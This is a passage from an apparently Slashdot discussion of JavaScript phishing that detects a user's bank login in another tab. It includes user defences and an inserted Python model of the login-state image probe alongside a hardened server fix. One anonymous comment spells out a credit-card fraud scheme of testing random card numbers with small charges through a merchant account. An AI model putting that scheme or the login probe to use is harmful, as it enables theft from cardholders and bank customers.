      Exactly. Has anyone else noticed that pretty much every DUI coming down the road uses a car? A hammer used to pound in nails, or pound someone in the head. Javascript is a tool like any other. Doesn't mean we're running around figuring cars and hammers are a bad idea because they're abused in a few cases by stupid/bad people. Should we find better ways to secure abuse of JS? Sure, I have no problem with that.

      ActiveX is another issue. The browser was SUPPOSED to be platform independent. ActiveX, like so much other BS coming out of Redmond, broke that. While it could be argued that flash support lags behind for *nix platforms - Flash isn't bundled with the browser, by the people who make the browser, who push PHBs to make their devs build ActiveX controls instead of real sites. AFAIK, there is no ActiveX for anything *except* windows machines - unlike Java, Flash, Javascript, etc.

      Now, given that, the one ActiveX control I've seen that I do like, and *do* understand is one on HP's site for installing printer drivers. It makes sense in that situation - but it isn't required for the HP site to function - there are several other vectors to obtain drivers.

      --
      There is very little future in being right when your boss is wrong.
    20. Re:XSS by wiredlogic · · Score: 1

      Thank god PayPai is designed not to use persistent cookies for authentication.

      --
      I am becoming gerund, destroyer of verbs.
    21. Re:XSS by hairyfeet · · Score: 1

      So, in other words ActiveX would have been fine if it would have been platform independent, since "A hammer used to pound in nails, or pound someone in the head. Javascript is a tool like any other. Doesn't mean we're running around figuring cars and hammers are a bad idea because they're abused in a few cases by stupid/bad people." Right?

      While I agree with you that JavaScript is a tool just like any other, in its current implementation I think it is a BAD tool. The problem isn't the code itself, it is the fact that most sites are loading it from a third party that they have NO control over. So even if you write the most secure site known to man, where God himself blesses your code with righteous security FU, if the site that serves the web ads that pays your bills hands you a malicious JavaScript your users are boned. That is BAD. We should not be running code from third parties. I might trust you, and might have done business with you in the past. But with third party JavaScript your security is only as good as whatever ad agency buys space off of you this week. And that is....well bad.

      We should either go back to ads being static, or JavaScript should be completely sandboxed and scanned BEFORE it is run. At the very least we should be trying to have a dialog between security researchers and those that support JavaScript to try to find safer ways to implement it. But what we have now where all the browsers are in a pissing contest to see who can render JavaScript faster is frankly a recipe for disaster. What we need is more security IMHO, not more speed. I am sure if you ask most folks out there they'd be happy to give up three seconds if they were given a safe browsing experience in return. But at the very least with "JavaScript exploit o' the day" seeming to be an everyday occurrence shouldn't we be at least having a more public debate on how to secure it?

      --
      ACs don't waste your time replying, your posts are never seen by me.
    22. Re:XSS by jspraul · · Score: 1

      HTTP Referer checking sounds like a "works for most" solution.
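      The two server-side fixes proposed in this thread, the per-session "salted" resource URL (post 11 above) and Referer checking (post 22), modelled in one added example that is not the article's or any bank's code. The hostnames, paths, user names and the naive/hardened switch are constructed for illustration; the check function plays back the onload/onerror probe the thread describes against both server policies, so a defender can see which one leaks login state.

```python
"""Added example (not from the article or any bank's code): a model of the
login oracle the thread describes and of two defences proposed in it,
per-session "salted" resource URLs and Referer checking. All hostnames,
paths and users are constructed placeholders."""
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlparse

BANK_ORIGIN = "https://www.mybank.example"        # constructed placeholder
PROTECTED = {"/protected/images/lock.gif"}         # served only after login
PUBLIC = {"/images/logo.gif"}                      # served to anyone


@dataclass
class Session:
    user: str
    salt: str  # unguessable token the bank embeds in this session's protected URLs


@dataclass
class BankServer:
    hardened: bool                                 # False = the naive server from the thread
    sessions: Dict[str, Session] = field(default_factory=dict)   # cookie -> Session

    def login(self, user: str) -> str:
        """Create a session; returns the session cookie the browser will store."""
        cookie = secrets.token_urlsafe(32)
        self.sessions[cookie] = Session(user, secrets.token_urlsafe(32))
        return cookie

    def page_url(self, cookie: str, path: str) -> str:
        """URL the bank's own HTML embeds for a logged-in user's page."""
        if not self.hardened:
            return BANK_ORIGIN + path
        return f"{BANK_ORIGIN}{path}?salt={self.sessions[cookie].salt}"

    def handle(self, url: str, cookie: Optional[str],
               referer: Optional[str]) -> Tuple[int, Dict[str, str]]:
        """Decide one request as the browser would send it: returns (status, headers)."""
        parsed = urlparse(url)
        if parsed.path in PUBLIC:
            return 200, {"Cache-Control": "public, max-age=86400"}
        if parsed.path not in PROTECTED:
            return 404, {}
        session = self.sessions.get(cookie) if cookie else None
        if not self.hardened:
            # Naive policy: any request carrying a valid session cookie succeeds,
            # so a third-party <img> fires onload exactly when the victim is logged in.
            return (200, {}) if session else (401, {})
        # Hardened policy: the request must carry the session's salt (known only to
        # HTML served to that session) and come from the bank's own origin. The
        # Referer check is defence in depth (browsers may omit the header); the
        # salt is the control that makes the URL unguessable. Every other request
        # gets the same 404 a missing file would, so there is nothing to observe.
        salt = parse_qs(parsed.query).get("salt", [""])[0]
        same_origin = referer is not None and referer.startswith(BANK_ORIGIN + "/")
        if session and same_origin and secrets.compare_digest(salt, session.salt):
            return 200, {"Cache-Control": "no-store"}   # never cache a login-gated resource
        return 404, {}


def image_loads(server: BankServer, url: str, cookie: Optional[str],
                referer: Optional[str]) -> bool:
    """onload (True) or onerror (False): all a third-party page can observe."""
    status, _ = server.handle(url, cookie, referer)
    return status == 200


def login_oracle_leaks(server: BankServer) -> bool:
    """Regression check for the server policy: does a third-party page's <img>
    probe, as the thread describes it, load differently before and after the
    victim logs in? The probing page knows only the path, the browser attaches
    the victim's bank cookie, and the Referer is the probing page's own origin."""
    guess = BANK_ORIGIN + "/protected/images/lock.gif"
    third_party = "https://www.malware.lol/"       # origin used in the thread
    logged_out = image_loads(server, guess, None, third_party)
    cookie = server.login("alice")
    logged_in = image_loads(server, guess, cookie, third_party)
    return logged_out != logged_in


def legitimate_flow_works(server: BankServer) -> bool:
    """The bank's own page must still get its image, marked not to be cached."""
    cookie = server.login("bob")
    url = server.page_url(cookie, "/protected/images/lock.gif")
    status, headers = server.handle(url, cookie, BANK_ORIGIN + "/account_summary")
    return status == 200 and headers.get("Cache-Control") == "no-store"


if __name__ == "__main__":
    print("naive server leaks login state:", login_oracle_leaks(BankServer(hardened=False)))
    print("hardened server leaks login state:", login_oracle_leaks(BankServer(hardened=True)))
    print("hardened legitimate flow works:", legitimate_flow_works(BankServer(hardened=True)))
```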

  3. Simple Solution... by Klootzak · · Score: 4, Informative

    Don't have multiple tabs/windows open while you're doing your online banking!!!

    Oh, and use NoScript!

    --
    A Man's ethical behavior should be based effectually on sympathy, education, and social ties -- Albert Einstein
    1. Re:Simple Solution... by Bozzio · · Score: 1

      This, like most phishing attempts, targets users who don't know about NoScript or basic internet safety practices.

      Yelling "Install NoScript you n00bs!!1!" won't register noobs... because they're newbs.

      --
      I just pooped your party.
    2. Re:Simple Solution... by X0563511 · · Score: 4, Insightful

      Once more, Darwin extends into the internet.

      Computers are tools. They do what they are told without question. The internet is made of computers. By extension, it is a tool that does exactly what it is told.

      Kind of like a handgun, and you don't (usually) let people run around with those without some kind of training.

      Also like a handgun, most tools don't care who is issuing the instructions - they just do it. That tablesaw doesn't care if it's a 2x4 or your forearm, it saws anyways.

      Yes, I'm an elitist bastard sometimes.

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    3. Re:Simple Solution... by Klootzak · · Score: 4, Informative

      Yelling "Install NoScript you n00bs!!!" won't register noobs... because they're newbs.

      Well, I wouldn't call them n00bs firstly... and secondly, most of the technically-savvy geeks/nerds I know read Slashdot and find out new and interesting stuff from here.

      One of the best things about Slashdot is if you write something on here, a lot of people will take notice. So if by providing solutions/information that people can read and take away to tell other non-technically-savvy individuals helps protect at least one person from being scammed, I'm more than happy to yell on Slashdot about it ;)

      --
      A Man's ethical behavior should be based effectually on sympathy, education, and social ties -- Albert Einstein
    4. Re:Simple Solution... by Spacejock · · Score: 1

      I second that. I've been using noscript for years, and wouldn't browse the net without it.

    5. Re:Simple Solution... by Anonymous Coward · · Score: 0, Flamebait

      This, like most phishing attempts, targets users who don't know about NoScript or basic internet safety practices.

      Yelling "Install NoScript you n00bs!!1!" won't register noobs... because they're newbs.

      You're onto something, but I'd like to kill the problem at its source: The fuckwit marketroid goons who demand the use of Javashit on the fucking login page in the first place.

      (I'm not a fundamentalist about this. There may be legitimate reasons why you might want to use Javashit, served via https, to customers who are already logged into a banking website. But there is no legitimate reason to use Javashit on a login page.)

      Sorry if I come across as bitter. I remember the first fucking time that Bank of America switched to the "new and improved" login page. I saw so many flashes to "www.liveperson.com" that I thought the box had been compromised.

      Turns out that the domain was a legitimate provider of "outsourced chatbot-in-india" services. The stupid marketing motherfuckers at BAC were loading third-party Javashit so that n00b customers too stupid to figure out "login" and "password" could resolve their confusion by "chatting with a live person". In so doing, they exposed all of their customers to risk, because one required Javashit to log into the damn site in the first place. I uttered a few more oaths too foul for even the tender ears here, and blocked the goddamn domain just out of spite.

      Anyways, you're right in that the root cause of this problem isn't n00bs who don't know how to install something like noscript. The root cause is the clueless twats at the banks, who disallow logins from users with Javashit deactivated.

      Seriously, you don't need Javashit to accept an entry - be it login, acceptance of a third-factor authentication, or a password - in an https:// form.

      Don't use Javashit on the login page, and then users won't have to enable the security hole in order to log into the website.

    6. Re:Simple Solution... by Anonymous Coward · · Score: 0

      "register WITH noobs"

      damn, I wish I had proof-read that last commie.

    7. Re:Simple Solution... by delvsional · · Score: 0, Offtopic

      Also like a handgun, most tools don't care who is issuing the instructions - they just do it. That tablesaw doesn't care if it's a 2x4 or your forearm, it saws anyways.

      Most table saws anyway.

      http://www.youtube.com/watch?v=CorOfxWfTU8

      --
      Oh Crap, I'm an optimist.....
    8. Re:Simple Solution... by postmortem · · Score: 1

      I do that practice, because I never know what other sites are doing. However this might not be sufficient for two reasons: 1. A well-crafted site could manage to remain hidden after you navigate away from it, by simply having some event-driven routine that is called when the user leaves the page - we all have seen these popups when you leave the page. 2. Firefox is known to keep your viewed pages in RAM, even after you leave the site. I assume that this is well guarded and probably secure.

    9. Re:Simple Solution... by j01123 · · Score: 3, Interesting

      Oh, and use NoScript!

      Another simple change is to set dom.disable_window_open_feature.location to true. That should make it pretty obvious when a popup comes from source different than what it's claiming.

    10. Re:Simple Solution... by calmofthestorm · · Score: 1

      HOW CAN I INSTALLS NOSCRIPTS ON MY WINDOWS MICROSOFT EXPLORER VISTA? KTHANKSBYE!

      Sarcasm aside, that's not going to cut it. We may be in an arms race, but we do need to try to keep up. The internet should not just be for technogeeks any more than medicine should be only for doctors. But I guess you can argue that this is like a doctor telling you to eat well, exercise regularly, and lose Windows--erm, weight.

      --
      93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
    11. Re:Simple Solution... by Cato · · Score: 1

      Thanks for the tip. At least for Firefox 3 on Linux, this is set to true by default.

    12. Re:Simple Solution... by Anonymous Coward · · Score: 0

      Nice of you to help other people Klootzak.

      Sorry, couldn't resist;)

      (For non-Dutch people, Klootzak=asshole/dick/very bad person/smeerlap)

    13. Re:Simple Solution... by Anonymous Coward · · Score: 0

      Ironically, the bad guys can skip the internet browser step all together. Because that's just how secure the banking and credit system is in the U.S.

      1. Establish a small company. Preferably one that deals in non-tangible services.
      2. Operate this company in a pretty low key and legal manner for about a year.
      3. Get approved to charge on credit and debit by the major institutions. (This step is important!)
      4. Sample random account and credit card numbers. Bill them a very small fee like $1 to $2, so if it bounces back it's no big deal.
      5. Keep track of the accounts and numbers that do go through. Put them under a billing program that charges $10 to $20 per month.
      6. Grow your company by adding branch subsidiaries. The more convoluted and less traceable to the parent company the better. Operate in the same manner as steps 1 through 5.
      7. When expanding, hire temporary workers that are only minimum wage. Treat them like dirt. Or do work-from-home programs. Make sure they stay minimum wage and clueless. This is how you expand while minimizing accountability.
      8. ??????
      9. Profit!

      By charging small fees, it seems the credit card companies and FTC can be kept pretty ignorant. Also small fees are likely to be ignored because they hide easily amongst all kinds of service charges. Only people that are vigilant will catch this stuff, so small fees by charge-backs aren't the worst things for your operation. The feds go after fishy stuff that happens in big numbers. The fishy stuff that happens in small numbers is just as profitable, because you're hitting so many people at once with this scheme. (And it works exactly like that hack to the accounting program in the movie Office Space.)

      Because schemes like this do seem to work, it's fairly obvious that banking and credit networks are insecure by default. (Banks and credit cards really need to implement a pre-validation scheme for approval of online charges, or some similar security system.) Right now there's no need to have the victim also get tricked by a middle-man method. Just roll random numbers once you're in the system and see if the charges stick. It's no harder than building a valid phone list by cold-calling and seeing if there's an answer.

    14. Re:Simple Solution... by Anonymous Coward · · Score: 0

      Computers are tools.

      No, you're a tool!! I'm a computer you insensitive clod!

    15. Re:Simple Solution... by quintessentialk · · Score: 1

      Yelling "Install NoScript you n00bs!!1!" won't register noobs... because they're newbs.

      And if they were to install noscript, they wouldn't have the skill or patience to configure all the exceptions, and would complain to you about their broken Internet.

      Am I the only one on Slashdot who thinks javascript is a powerful tool that adds much more to the web than it risks? I mean, sure, cutting off your arm is a great way to reduce the risk of fingernail infection, but who would want to do that?

  4. And it's been there all of these years by SpaceLifeForm · · Score: 1

    Funny how I got a Flash ad thrown my way when I visited the link.

    --
    You are being MICROattacked, from various angles, in a SOFT manner.
    1. Re:And it's been there all of these years by stonedcat · · Score: 0

      Change all your bank accounts and destroy your computer quickly! The bad guys are gonna get ya!

      --
      You can't take the sky from me.
  5. Things to learn from this. by john.picard · · Score: 5, Insightful

    The next thing you know, they'll make up a screen scraper in JavaScript. There are several things to learn from this. For the users: one, that you should completely clear your browser (Clear Private Data or similar) before going to a banking website; two, that you should NEVER open other websites (or have them open) while you're signed in to a banking website; third, that when you've finished banking, you should completely clear your browser again. For the browser makers (Firefox devs reading this?), third party cookies should be disabled by default, the option to turn them on should come with stern warnings, and each website can ONLY read cookies previously set by itself. Further, when an encrypted page is opened, its memory should be such that other pages cannot access any part of it. In other words, the same sandboxing approach taken to deal with other security issues, within the browser for encrypted pages.

    1. Re:Things to learn from this. by Fian · · Score: 5, Interesting

      Perhaps it is time to have a dedicated banking browser? One that does not use cookies/cache data/allow more than one tab etc etc

    2. Re:Things to learn from this. by sonamchauhan · · Score: 1

      Does Google's Chrome browser do something to this effect? I recall something about Chrome running each webpage in an independent process, not as independent threads.

    3. Re:Things to learn from this. by Fian · · Score: 1

      Haven't really looked at Chrome but I'd assume each process (tab) would still be looking at a centralised cookie cache.

    4. Re:Things to learn from this. by ljubom · · Score: 3, Insightful

      It would be cool to have firefox "mode" doing exactly this. Press an "online-banking" button and a new isolated firefox session would be started with all needed restrictions and settings.

    5. Re:Things to learn from this. by failedlogic · · Score: 2, Interesting

      I try and shy away from online-Banking as much as I can. Never mind separate browser. I use a Live Linux DVD and load up my bank site from there. When I do this it's boot, bank website, print if necessary, shutdown and back to Windows.

    6. Re:Things to learn from this. by Anonymous Coward · · Score: 0

      Each process has its own session, so session cookies should be safe.

    7. Re:Things to learn from this. by labnet · · Score: 2, Interesting

      Or you should get a one time key generator.
      My key changes every 60 seconds. Could they exploit this within that time frame. (Especially if I'm already logged on and the bank does not allow a second simultaneous login)

      --
      46137
    8. Re:Things to learn from this. by OpenSourced · · Score: 3, Interesting

      I, for one, have a dedicated VMWare virtual machine with Ubuntu installed, and Firefox. Firefox has NoScript installed, is set to save no history, and I use it only for banking. I find the setup a bit unwieldy sometimes, but it is sure safer.

      --
      Rome taught me patience and assiduous application to detail. Virtues which temper the boldness of great, general views.
    9. Re:Things to learn from this. by Anonymous Coward · · Score: 0

      You're paranoid.

    10. Re:Things to learn from this. by guruevi · · Score: 1

      If the cracker is technical enough, yes they can. Again, you would have to have a dodgy site on one site, banking on the other (porn & banking, a good combination) then as soon as the JavaScript detects that it has access to the other page, it can start 'clicking' stuff from the other website and while you're logged in transfer $ from your account elsewhere or just request the page that has your account numbers on it and send it to a server somewhere.

      --
      Custom electronics and digital signage for your business: www.evcircuits.com
    11. Re:Things to learn from this. by fprintf · · Score: 2, Interesting

      I'd bet this is something that could be created in GreaseMonkey or otherwise developed as an add-on for Firefox. It would certainly be an effort I would contribute to as this discussion is making me paranoid.

      --
      This post brought to you by your friendly neighborhood MBA.
    12. Re:Things to learn from this. by Anonymous Coward · · Score: 0

      The advantage here is that if your bank supplied you with software for banking (browser or otherwise) then the exchange of public keys could be done in a secure fashion (ie. I can trust this disk handed to me by my banker).

      The software would be set up to only trust the specific sites created by the bank providing it, and would allow no information access into/outof the browser (sadly, key-loggers could still hit ya).

      Seems that this could be fairly easily (for software definitions of easy) branched from firefox, which would also mean that once a bank did it that all other banks could easily copy it (which might be why no banks are trying yet), thus quickly the arena of online banking could become more secure.

    13. Re:Things to learn from this. by Jeremi · · Score: 1

      It would be cool to have firefox "mode" doing exactly this. Press an "online-banking" button and a new isolated firefox session would be started with all needed restrictions and settings.

      That would indeed be quite useful. I'd put a button just like it into my JavaScript; clicking it would take you directly to my phishing site.

      --
      I don't care if it's 90,000 hectares. That lake was not my doing.
    14. Re:Things to learn from this. by Jason+Levine · · Score: 1

      Perhaps this is a job for Prism? Have your bank's site run inside a Prism session, completely unconnected to any other website. I do this with Google Reader mainly because I like the increased screen space I get over FireFox (don't need tabs and such taking away screen space). I just launch my Google Reader Prism shortcut and away I go.

      --
      My sci-fi novel, Ghost Thief, is now available from Amazon.com.
    15. Re:Things to learn from this. by CmdrPorno · · Score: 1

      Safari has Private Browsing for banking, or for porn, but apparently not for both at the same time.

      --
      Sent from my iPhone
    16. Re:Things to learn from this. by Anonymous Coward · · Score: 0

      I don't think you have any idea what you are talking about. How does the attacker's script get access to the bank's website? Scripts can't just do things on other sites because you have a browser window open. Same origin policy.

    17. Re:Things to learn from this. by Anonymous Coward · · Score: 0

      bull fucking shit. you're impressing nobody

    18. Re:Things to learn from this. by badkarmadayaccount · · Score: 1

      I think Incognito mode window is what you are looking for.

      --
      I know tobacco is bad for you, so I smoke weed with crack.
  6. Use a separate Firefox profile for banking by Anonymous Coward · · Score: 2, Interesting

    This is why I use a separate Firefox profile for banking and bill paying. And I only have one tab open at a time.

  7. The article doesn't describe the actual exploit by dmomo · · Score: 3, Interesting

    The only way I can imagine that js on one site can detect if a user is logged into another (assuming the other site is secure and I cannot post js to it) would work like this:

    Use an Asynchronous request to "curl" out to a well known page of that site and then "grep" the response for typical "you are not logged in" text. If it is not found, commence shenanigans.

    BTW, this comment kind of made me roll my eyes:

    "Klein says placing a low-profile piece of malicious JavaScript on a high-profile Website isn't difficult to do, and the malware is basically invisible to the user."

    "Klein" makes it sound like this is a walk in the park. I don't know. After the myspace worm a few years back, I think validation and filtering on those sites has gotten pretty good. Low-profile sites? Sure. High-profile sites? Not so much. I'm not saying it's not possible, but "not difficult"... maybe Klein is just conceited.

    1. Re:The article doesn't describe the actual exploit by The+MAZZTer · · Score: 1

      It's called Cross-site scripting. Except in this case I don't think XSS exactly describes the type of attack we see here.

    2. Re:The article doesn't describe the actual exploit by SlashRSlashN · · Score: 0

      "cURL" out to those sites?
      Sir, if we had the credentials needed to send a cURL request with your cookies (to see if you were logged in), you've already been hijacked. (cURL requests are server-side.)

      The vulnerability comes more from the fact that some browsers let JavaScript "see" what the URL of another window is.

      Oh, that, and many people won't notice that the URL isn't from their bank.

      Funny, though. A modern pop up blocker will stop this 9/10 times (unless you do the infamous body.onclick trick).

    3. Re:The article doesn't describe the actual exploit by dmomo · · Score: 2, Informative

      I agree. Most XSS attacks would require the banking site to have a vulnerability. This article implies that all one needs is a vulnerability on the first (high-profile) site.

    4. Re:The article doesn't describe the actual exploit by blueg3 · · Score: 1

      It's true. There's been quite a bit of research into it, mostly at Google. While you might not be able to pick a particular high-profile site and sneak JavaScript onto it, getting your JS onto "high-profile sites" in general is not difficult.

    5. Re:The article doesn't describe the actual exploit by sugarmotor · · Score: 1

      What if the cookie of the target site is against a host name such as

      http://094ec182f4a74bc1382206407.bank.com/

      The attacker would not waste their time trying to guess the (randomly generated) 094ec182f4a74bc1382206407 part.

      So when you log in, you're logging in with a host name with a token.

      Stephan

      --
      http://stephan.sugarmotor.org
    6. Re:The article doesn't describe the actual exploit by Terrasque · · Score: 1

      That's actually a pretty interesting idea. They could for example allocate *.in.bank.com for this purpose.

      This would of course have to be in addition to all other security layers.

      --
      It's The Golden Rule: "He who has the gold makes the rules."
    7. Re:The article doesn't describe the actual exploit by Emb3rz · · Score: 1

      Interesting, but hardly to be considered comprehensive.

      It's easy enough to parse just the root domain and other telling parts of the URL for sites that attempt to use 'security' of that sort.

    8. Re:The article doesn't describe the actual exploit by citizenr · · Score: 1
      --
      Who logs in to gdm? Not I, said the duck.
  8. Not common yet.....? by biocute · · Score: 1

    From the friendly article: although he and his research team have not spotted full-blown attacks like this in the wild as yet

    I'm sure they will now after this.

  9. Already dedicate browser sessions to banking only by Raul+Acevedo · · Score: 1

    I already make sure that if I'm going to visit my bank, I close my browser, start a new one, do the banking thing, then close the browser before I do anything else. While banking I don't browse other sites.

    I figured an attack like this was possible but had no idea there was a way to check other sites you are visiting via JavaScript. That seems like a very obvious security flaw. Anyone know how that is possible? Is it via standard JavaScript, or does it require a bizarre hack that happens to work on today's browsers? The article doesn't say.

    --
    In a real emergency, we would have all fled in terror, and you would not have been notified.
  10. Is Chrome vulnerable? by olddotter · · Score: 1

    I wonder if Chrome's idea of running each tab in a separate process makes it less vulnerable to this type of attack? I suspect that it is much harder for there to be a cross-tab or cross-window attack via JavaScript if each has its own full process.

  11. maybe being obsessive pays off by NotQuiteReal · · Score: 1

    I always see folks bitching and moaning that FireFox burns memory... if you leave it open all day. Why would you do that? I must open FireFox 50 times a day, and never complain about the extra 1.5 seconds it takes to do that; at least I know I have a "fresh start".

    Often, I also delete all the cookies too, just because I am a neat freak, not due to paranoia. Maybe I get more secure sessions as a side effect.

    Anyhow, keeping your kitchen neat and clean is healthy. Maybe keeping your computer neat and clean is more secure. Sometimes, a reason like "because I said so", works out to be a good thing, even if the reasons are not articulated.

    --
    This issue is a bit more complicated than you think.
    1. Re:maybe being obsessive pays off by Spacejock · · Score: 1

      For some reason, FF 3.0 freezes for about eight-ten seconds after I start it up, every single time. It's very, very irritating, and the behaviour encourages me to leave it open as much as possible. (This never happened with FF 1 or 2)

      I have a dual core cpu with gigs of ram, so it's not a hardware issue. Running another profile (with few bookmarks) on the same PC doesn't exhibit the same problem, and I can only assume it's the browser rechecking links, favicons or something else every time I start it up. (places.sqlite is 31mb)

      I disabled the url security thingo which reads/writes the 10mb urlclassifier2.sqlite file, but that made little difference. I guess I could delete 90% of my bookmarks, but I really don't want to do that.

    2. Re:maybe being obsessive pays off by rickb928 · · Score: 1

      There are some limitations to that scam:

      - You will have to deposit the funds into a merchant account. Be assured they will come calling when your fraud rate goes sky-high. Your bank also.

      - Most terminals need to be programmed correctly. This includes merchant-specific data. The attempt, if it is caught, will identify the merchant, and the previous advice kicks in.

      - While banks aren't as diligent in tracking ATM fraud, the credit card processors and issuing banks do take cc fraud seriously, and you will need to move the money very quickly. Which the bad guys do do...

      I guess my re-install of XP will include a VM and Ubuntu in there. Can't be too sure.

      --
      deleting the extra space after periods so i can stay relevant, yeah.
  12. New ways to steal. by dinther · · Score: 1, Offtopic

    Are you kidding? Internet security clowns have a very limited imagination. They go nuts on securing one aspect beyond usability while completely ignoring other areas.

    Here in NZ there is a problem with ATM machine skimmers. Criminals equip the ATM machine with camera and fake card reader and collect card and pin codes from unsuspecting users after which they raid their bank accounts.

    So everyone is worried about this now. Yet, the most popular form of electronic payment in shops in NZ is the use of a bank card combined with a pin code (EFT Pos).

    I use it all the time to the point that I rarely see cash. Yet, it only takes a single merchant borrowing a mobile EFTPos installation to skim as many cards as he wants.

    Simple. Grab a card reader, fake entry terminal and a simple micro processor and sell some stuff cheap so you get many customers. Add a simple bit of programming. The client payment experience is the same on the fake payment system and they won't pay any attention. After all they are not pulling cash out of a machine but are excited making a payment for a deal too good to be true. No need to suspect anything, after all they walk away with the goods. You collect the card data and pin code and make the same transaction later. Now you either sell on the card data or use it to make small payments or large payments as long as you can get away with.

    Unlike ATM machines, equipment for electronic bank transactions in shops is completely in the hands of the vendor and totally open to abuse. Yet nobody worries about it because it has not happened or has not been detected to the extent that the media jump on it.

    And don't get me started on credit cards.

    1. Re:New ways to steal. by sincewhen · · Score: 2, Informative
      --
      -- Braden's law of data: All data spends some of its lifetime in an excel spreadsheet.
    2. Re:New ways to steal. by carnalforge · · Score: 1

      Well, here in Italy at least, when I pay or get cash with my card, a few seconds later I get an SMS telling me how much money got spent and where. Sure it does not stop people from stealing from my account but at least I get to know it really soon.
      And as for online banking, to access my account I have to put in a username, a password chosen by me and a code generated from an electronic key which is valid for just 30 seconds.
      Of course, the best defense is knowledge obviously.

      --
      :wq!
  13. thus making the web suck ass by r00t · · Score: 1

    Half my desktop or more is web. These days you can use the web for spreadsheets, word processing, email, chat, and so on.

    Closing all those windows would suck ass.

    The browser damn well ought to isolate the web sites 100% from each other. WTF?

    Instead, the damn thing frustrates any attempt at manual isolation. If I try to start a second instance, that one does some retarded RPC thing to have my other browser instance spawn the new window -- and then that second instance exits!

    It's not even fail safe. Crash in one window, and all the windows go.

    IMHO, a retarded bovine could get security right. It took real effort to fuck things up.

    1. Re:thus making the web suck ass by SleepyHappyDoc · · Score: 1

      Are you suggesting I shouldn't be able to cut a link from one window and paste it into another? What about legitimate cross-site scripting, like using your Facebook account to comment on Gawker Media blogs? It's not nearly so black-and-white.

      --
      Stasis is death. Embrace change.
    2. Re:thus making the web suck ass by Anonymous Coward · · Score: 0

      Nobody wants to disallow cut and paste. What a straw man.
      And if site A wants me to use my account on site B, it should ask me for my OpenID. There's nothing legitimate about login info (and logged-in state is login info) being shared automatically between browser tabs, without even an option to disable it.

    3. Re:thus making the web suck ass by fmobus · · Score: 1

      I could be wrong, but there is nothing keeping OpenID admins from faking your login and telling site A they are you. OpenID is not reasonable for banking applications. But anyways, internet banking has been so fucked up for so long that I can see crap like that coming.

      Also, proper security for online banking should never require kludges like Java Applets or client-side "security checkers", as I have seen in my country's banking.

      A login page should be a very normal login page, followed by a One Time Pad request (alternatively, OTP could be requested only for non-idempotent transactions). This is simply the best solution - any bank that neglects that is stupid. OTP can be implemented in various ways... digital keyfobs are surely the best, but even a sheet of paper with a table of codes will do the trick.

    4. Re:thus making the web suck ass by Anonymous Coward · · Score: 0

      Instead, the damn thing frustrates any attempt at manual isolation. If I try to start a second instance, that one does some retarded RPC thing to have my other browser instance spawn the new window -- and then that second instance exits!

      THIS.

      Huge pet peeve of mine.

      For the love of "Bob", why isn't there a "mozilla -launchmeinanewprocess" flag. It doesn't have to be (and given the obvious consequence to the n00bs, probably shouldn't be) the default behavior, but sometimes I really do want two copies of the damn thing resident in memory.

    5. Re:thus making the web suck ass by SleepyHappyDoc · · Score: 1

      How is what I said a straw man? He said 100%, I was asking how much of 100% he meant.

      --
      Stasis is death. Embrace change.
    6. Re:thus making the web suck ass by Anonymous Coward · · Score: 0

      I'd prefer to be sympathetic since it's fun to bash Microsoft, but honestly, why are you trying to do *everything* with a generic interface that was never intended to do *any* of those tasks? It's a web browser. It is for, get this, browsing the web. A word processor on the other hand, is for writing and editing documents. An email program is for *gasp* sending and receiving email! How many times has my word processor crashed my email? Never. When was the last time a chat session interfered with my budget spreadsheet? Never. How do I possess such magical ability? It's called not being retarded.

    7. Re:thus making the web suck ass by r00t · · Score: 1

      For cut-and-paste, it depends on how the operation is controlled. The web sites must not be able to freely read and write to a shared cut/paste buffer. It has to only operate under user control.

      (ideally with OS-level trusted path, but for now we can settle for decent browser control)

      I'm not so sure there is legitimate cross-site scripting. Possibly it's OK to have web sites specify trusted peers. Possibly it's OK to have an anything-goes policy for unencrypted sites.

  14. Damnit by freddy_dreddy · · Score: 0

    My father warned me about this. Hate it when he's right.

    --
    "Violence is the last refuge of the competent, and, generally, the first refuge of the incompetent" - Thing_1
  15. more fixes for the security model by r00t · · Score: 3, Insightful

    Any browser window containing content from more than one security context must NOT display any sort of lock icon, and must display a warning banner.

    "more than one" would include an https site that uses some http images. It's not secure if it's a mix.

    1. Re:more fixes for the security model by h4rm0ny · · Score: 1

      Oddly enough, this is something IE7 did (by displaying a very annoying mixed-content warning) but which Firefox 2 did not by default (though you could turn it on). I'm not sure about Firefox 3.

      --
      Aide-toi, le Ciel t'aidera - Jeanne D'Arc.
  16. The article makes it sound so simple... by BUL2294 · · Score: 1

    From TFA: "Klein says placing a low-profile piece of malicious JavaScript on a high-profile Website isn't difficult to do, and the malware is basically invisible to the user."

    I don't see how any well-designed high-profile site wouldn't account for the possibility it might get hacked, let alone not have an automated method for undoing the damage... A simple approach would be to generate an MD5 checksum from each file (i.e. ASP, JPG, flash) and compare it to the MD5 checksums of what they're "supposed" to be. Generate & compare every 15 or 30 seconds. If there's a discrepancy, copy the file back from a read-only source and send an administrative alert. Hell, it's a simple VBScript...

    --
    Windows 3.1x calc: 3.11 - 3.10 = 0.00
    1. Re:The article makes it sound so simple... by blueg3 · · Score: 4, Insightful

      You don't need to hack a high-profile site to put malicious JavaScript on there. Most high-profile sites, directly or indirectly, load tons of third-party objects.

      Advertising, for example, is an excellent JavaScript injection vector.

    2. Re:The article makes it sound so simple... by BUL2294 · · Score: 1

      True, but since the article specifically talks about banks, how many banks do you know of load 3rd party advertisements, especially on their online banking site? Sure, the bank might have some banner ads, usually for their own services like overdraft protection or mortgages, but no real bank would allow someone else to control even part of what appears to the end-user on their online banking site... You can bet that whatever banner ads appear are all hosted internally.

      --
      Windows 3.1x calc: 3.11 - 3.10 = 0.00
    3. Re:The article makes it sound so simple... by TerranFury · · Score: 1

      The whole point of this exploit is that the malicious Javascript isn't on the banking site but on another site open in another tab or browser window. E.g., suppose you have your bank's page open in one tab and Slashdot open in another, and Slashdot loads third-party ads.

    4. Re:The article makes it sound so simple... by blueg3 · · Score: 1

      You don't need to have the JavaScript loaded through the bank's website. A user has two tabs or windows open: one to their bank, one to a popular site into which you can inject your malicious JS. The second, non-bank site can detect that you have logged in to your banking site and can display a popup prompting you for login information (which should cause you to be suspicious, but hey, this is phishing).

      Injecting JavaScript into the bank's website is enormously more dangerous (but also already well-known).

  17. Ban Pop-ups by Spy+Hunter · · Score: 1

